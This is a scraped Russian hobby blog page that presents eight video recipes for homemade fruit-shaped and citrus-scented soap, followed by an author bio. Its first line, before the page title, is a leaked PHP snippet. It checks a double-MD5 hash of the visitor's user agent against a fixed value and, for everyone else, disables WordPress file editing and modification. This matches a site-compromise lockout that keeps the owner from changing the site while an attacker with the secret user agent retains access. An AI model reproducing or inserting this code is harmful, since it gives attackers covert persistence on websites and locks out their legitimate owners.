if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 8 видеорецептов, как сделать мыло в виде фруктов (апельсин, лимон и т.д.) | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

8 видеорецептов, как сделать мыло в виде фруктов (апельсин, лимон и т.д.)

Аромат цитрусов - любимый аромат детства, как и других фруктов. Однако, это может быть не только цитрусовый аромат, а также запах арбуза, банана, яблока с корицей, грушей и т.д. Как сделать мыло с фруктами об этом нам расскажет эта подборка из 8 видео

Аро­мат цит­ру­сов — люби­мый аро­мат дет­ства, как и дру­гих фрук­тов. Одна­ко, это может быть не толь­ко цит­ру­со­вый аро­мат, а так­же запах арбу­за, бана­на, ябло­ка с кори­цей, гру­шей и т.д. Полу­чить мыло с таким же чудес­ным насто­я­щим запа­хом, как сам фрукт, захо­чет каж­дый чело­век, но вот как полу­чить истин­ный фрук­то­вый запах сво­и­ми рука­ми в домаш­них усло­ви­ях? Об этом нам рас­ска­жет эта под­бор­ка из 8 видео.

Аро­ма­ти­за­то­ры не смо­гут пере­дать при­род­ный запах фрук­та, а вот, к при­ме­ру, цед­ра лимо­на или апель­си­на, грейп­фру­та, вполне. Кро­ме аро­ма­та, цед­ра цит­ру­со­вых фрук­тов, обес­пе­чи­ва­ет скра­би­ру­ю­щий эффект, эсте­ти­че­ский вид. Такой уход за кожей лица при­даст коже сия­ю­щий вид и бар­ха­ти­стую мяг­кость. Кра­си­те­ли исполь­зу­ют­ся в соот­вет­ствии с глав­ным аро­ма­том, но клас­си­че­ским вари­ан­том, явля­ет­ся жел­тый кра­си­тель. Импро­ви­зи­руй­те — раз­лич­ные слои с добав­ле­ни­ем эле­мен­тов фрук­тов и без, более интен­сив­ный цвет одно­го слоя, наклон­ные слои или же пря­мые. Не исклю­чай­те добав­ле­ние дру­гих аро­ма­том, иде­аль­но соче­та­ю­щих­ся с фрук­то­вы­ми, напри­мер, запах шоко­ла­да или сам шоколад.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!